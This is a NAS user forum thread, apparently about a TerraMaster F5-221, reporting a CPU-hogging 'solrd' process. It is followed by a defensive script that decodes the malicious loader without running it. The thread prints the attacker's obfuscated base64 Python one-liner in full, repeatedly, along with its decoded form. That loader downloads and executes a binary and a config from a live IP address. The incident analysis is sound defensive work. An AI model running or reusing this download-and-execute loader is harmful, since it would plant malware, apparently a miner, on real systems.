Hello all,
I saw that this process "solrd" is taking all the CPU resources from my F5-221 NAS. I post it here so everyone can see it.
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd
The decode is this Python script:
"""
f=open("./solrd","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/starrail/cbt2zip/setup.exe").read())
f.close()
f=open("./config.json","wb")
f.write(__import__("urllib2").urlopen("http://45.144.3.216:10000/TNAS.json").read())
f.close()
"""
So I guess someone got access to my NAS, using the TOS web access, and modified that configuration.
This is a serious security issue.
SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13
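A defender's triage helper, added here and not part of the thread: it scans `ps -ef` output for the `python -c "exec(... b64decode(...))"` loader pattern shown above, decodes the payload statically (nothing is executed or downloaded), and lists the URLs it fetches and the files it writes, so they can be blocked and cleaned up. The sample `ps` lines are copied from this thread; the function and constant names are my own.

```python
import base64
import re

# Constructed sample input: the ps -ef lines reported in this thread.
SAMPLE_PS = """root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
root 13229 13144 99 Aug06 ? 147-14:52:16 ./solrd
"""

# A base64 blob passed to b64decode() inside an exec'd one-liner.
B64_EXEC = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# URLs the decoded stage pulls from, and paths it opens for writing.
URL_RE = re.compile(r"https?://[^\s'\"()]+")
OPEN_WRITE_RE = re.compile(r"open\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]w")


def decode_blob(blob):
    """Decode a base64 blob tolerantly (fix missing padding); never exec it."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-8", "replace")


def triage_ps(ps_text):
    """Return one finding per process line that carries a base64 exec loader.

    Each finding records the PID (second ps -ef column), the decoded payload,
    the URLs it contacts and the files it writes.
    """
    findings = []
    for line in ps_text.splitlines():
        for blob in B64_EXEC.findall(line):
            try:
                decoded = decode_blob(blob)
            except ValueError:
                continue  # not valid base64; leave it for manual review
            cols = line.split()
            findings.append({
                "pid": cols[1] if len(cols) > 1 else "?",
                "parent": cols[2] if len(cols) > 2 else "?",
                "decoded": decoded,
                "urls": URL_RE.findall(decoded),
                "files_written": OPEN_WRITE_RE.findall(decoded),
            })
    return findings


if __name__ == "__main__":
    for f in triage_ps(SAMPLE_PS):
        print("pid %s (parent %s) fetches %s and writes %s"
              % (f["pid"], f["parent"], f["urls"], f["files_written"]))
```

The parent PID (4252, the `php-fpm: pool TOS` worker in the reply below) is what ties the loader to the web interface, which is the lead worth following when deciding what to patch or reset.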
Re: SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13
root 4252 4249 0 2021 ? 00:02:42 php-fpm: pool TOS
root 13144 4252 0 Aug06 ? 00:00:00 sh -c cd '/usr/www/module' ; /etc/init.d/nas/makemd -s0 -l;python -c "exec(__import__('base64').b64decode('Zj1vcGVuKCIuL3NvbHJkIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL3N0YXJyYWlsL2NidDJ6aXAvc2V0dXAuZXhlIikucmVhZCgpKQpmLmNsb3NlKCkKZj1vcGVuKCIuL2NvbmZpZy5qc29uIiwid2IiKQpmLndyaXRlKF9faW1wb3J0X18oInVybGxpYjIiKS51cmxvcGVuKCJodHRwOi8vNDUuMTQ0LjMuMjE2OjEwMDAwL1ROQVMuanNvbiIpLnJlYWQoKSkKZi5jbG9zZSgpCg=='))" && chmod 777 solrd && ./solrd; -b -tbtrfs 1646732740 &
Re: SOLRD Process using 100% CPU - F5-221 - TOS 4.2.13
This seems to be dig virus, please refer to this link: viewtopic.php?f=71&t=2292&p=12383&hilit=pty10#p12383.